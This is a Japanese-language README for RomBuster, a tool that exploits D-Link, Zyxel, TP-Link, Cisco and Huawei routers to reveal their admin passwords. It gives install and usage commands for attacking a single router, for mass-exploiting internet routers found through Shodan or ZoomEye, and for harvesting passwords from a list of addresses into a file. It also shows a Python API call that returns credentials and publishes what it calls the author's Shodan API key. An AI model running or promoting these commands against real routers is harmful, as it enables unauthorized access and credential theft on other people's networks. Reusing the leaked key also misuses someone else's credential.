RomBusterは、ネットワークルーターの管理パスワードを漏洩させることを可能にするルーターエクスプロイトツールです。
D-Link、Zyxel、TP-Link、Cisco、Huaweiなどの最も人気のあるルーターの脆弱性をエクスプロイトします。pip3 install git+https://github.com/EntySec/RomBuster
RomBusterを使用するには、ターミナルでrombusterと入力するだけです。
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
[--zoomeye ZOOMEYE] [-p PAGES]
RomBuster is a router exploitation tool that allows to disclosure network
router admin password.
optional arguments:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.
単一のルーターをエクスプロイト
ちょっと遊びで自分のルーターをハックしてみましょう。
rombuster -a 192.168.99.1
インターネット上のルーターをエクスプロイト
Shodan検索エンジンを使ってインターネット上のルーターをエクスプロイトしてみましょう。
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意: 上記のShodan APIキー(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)は私のPRO APIキーです。このキーまたはご自身のキーを自由に使用してください。リソースはすべて無料でご利用いただけます。
入力ファイルからルーターをエクスプロイト
公開されているルーターのデータベースを使ってみましょう。
rombuster -i routers.txt -o passwords.txt
注意: これにより、routers.txtリスト内のすべてのルーターがアドレスに従ってエクスプロイトされ、取得したすべてのパスワードがpasswords.txtに保存されます。
RomBusterには独自のPython APIもあり、コードにRomBusterをインポートして呼び出すことができます。
from rombuster import RomBuster
以下は、指定されたルーターをエクスプロイトするために使用できるRomBusterのすべての基本関数です。
exploit(address) - 指定されたアドレスの単一ルーターをエクスプロイトします。単一のルーターをエクスプロイト
from rombuster import RomBuster
rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.1')
print(creds)